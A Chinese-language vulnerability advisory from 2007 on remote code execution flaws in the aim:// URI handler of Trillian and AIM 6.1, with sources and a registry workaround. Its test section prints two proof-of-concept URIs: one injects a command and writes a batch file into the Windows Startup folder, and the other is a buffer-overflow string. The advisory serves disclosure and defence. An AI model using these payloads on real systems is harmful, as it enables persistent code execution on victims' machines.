Trillian aim:// URI处理器多个远程代码执行漏洞
发布日期:2007-07-16
更新日期:2007-07-18
受影响系统:AOL Instant Messenger 6.1
Cerulean Studios Trillian 3.1.6.0
描述:
BUGTRAQ ID:
24927
Trillian是一个聊天程序,和多种即时通讯程序使用相同的接口,包括AIM、ICQ、Yahoo! Messenger、MSN Messenger和IRC。
Trillian的aim:// URI处理器在将某些部分的aim:// URI写入到ini=参数所指定的文件之前没有执行正确的验证,如果用户受骗跟随了特制的aim:// URI的话就可能导致向Windows的“开始”文件夹写入批处理文件。
Trillian的aim.dll插件没有正确的处理aim:// URI。如果用户受骗跟随了特制的aim:// URI的话,就可能触发缓冲区溢出,导致执行任意指令。
<*来源:Billy (BK) Rios (billy.rios@gmail)
Nate Mcfeters (nate.mcfeters@gmail)
链接:
http://secunia.com/advisories/26086/
http://www.xs-sniper.com/nmcfeters/Cross-App-Scripting-2.html
http://www.kb.cert.org/vuls/id/786920
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
aim:///#1111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666
建议:
临时解决方法:
* 禁用aim:// URI处理器,删除或重命名以下注册表项:
HKEY_CLASSES_ROOT\AOL
厂商补丁:
Cerulean Studios
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ceruleanstudios.com/浏览次数:3242
严重程度:0(网友投票)
